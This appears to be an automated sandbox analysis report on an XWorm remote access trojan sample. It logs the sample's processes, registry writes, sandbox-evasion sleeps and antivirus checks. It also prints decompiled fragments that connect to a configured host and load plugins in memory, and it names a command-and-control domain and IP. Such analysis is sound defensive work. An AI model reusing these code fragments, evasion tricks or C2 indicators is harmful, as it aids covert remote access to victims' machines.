Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2552 --field-trial-handle=2496,i,13517212685356134340,2370661816050994569,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1124 --field-trial-handle=2028,i,13329251012211762179,12573226295212013179,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2552 --field-trial-handle=2496,i,13517212685356134340,2370661816050994569,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1124 --field-trial-handle=2028,i,13329251012211762179,12573226295212013179,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 Jump to behavior
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Section loaded: avicap32.dll Jump to behavior
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Section loaded: msvfw32.dll Jump to behavior
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation
barindex
.NET source code contains method to dynamically call methods (often used by packers)
Source: 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Helper.SB(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
.NET source code contains potential unpacker
Source: 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe, Messages.cs .Net Code: Plugin System.AppDomain.Load(byte[])
Source: 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe, Messages.cs .Net Code: Memory System.AppDomain.Load(byte[])
Source: 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe, Messages.cs .Net Code: Memory
Stores large binary data to the registry
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\082C2C722F273426B981 4DA7B92DD81FF96931AA9012EABAA0878D13C78DC3CD840B102CE7E15FEC4B7B Jump to behavior
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Memory allocated: 790000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Memory allocated: 1A4E0000 memory reserve | memory write watch Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Window / User API: threadDelayed 5864 Jump to behavior
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Window / User API: threadDelayed 3919 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe TID: 2720 Thread sleep time: -32281802128991695s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe TID: 8516 Thread sleep time: -240000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Thread delayed: delay time: 30000 Jump to behavior
Source: 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe, 00000000.00000002.4097113629.000000001B0BC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWrv%SystemRoot%\system32\mswsock.dll=neutral, PublicKeyToken=31bf3856ad364e35" />
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Process information queried: ProcessInformation Jump to behavior
Enables debug privileges
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Memory allocated: page read and write | page guard Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Queries volume information: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information
barindex
Yara detected XWorm
Source: Yara match File source: 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe, type: SAMPLE
Source: Yara match File source: 0.0.171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe.320000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000000.1624173863.0000000000322000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.4096024846.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe PID: 2260, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected XWorm
Source: Yara match File source: 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe, type: SAMPLE
Source: Yara match File source: 0.0.171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe.320000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000000.1624173863.0000000000322000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.4096024846.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe PID: 2260, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1432799 Sample: 171429109375b3b920cee552fad... Startdate: 28/04/2024 Architecture: WINDOWS Score: 100 19 nmds.duckdns.org 2->19 33 Snort IDS alert for network traffic 2->33 35 Multi AV Scanner detection for domain / URL 2->35 37 Found malware configuration 2->37 41 11 other signatures 2->41 7 chrome.exe 1 2->7         started        10 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe 2 2 2->10         started        12 chrome.exe 2->12         started        signatures3 39 Uses dynamic DNS services 19->39 process4 dnsIp5 21 192.168.2.4, 443, 49723, 49724 unknown unknown 7->21 23 239.255.255.250 unknown Reserved 7->23 14 chrome.exe 7->14         started        25 nmds.duckdns.org 87.121.105.4, 49730, 49746, 49750 NET1-ASBG Bulgaria 10->25 17 chrome.exe 12->17         started        process6 dnsIp7 27 www.google.com 172.253.115.147, 443, 49736, 49737 GOOGLEUS United States 14->27 29 plus.l.google.com 172.253.122.102, 443, 49745 GOOGLEUS United States 14->29 31 2 other IPs or domains 14->31
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

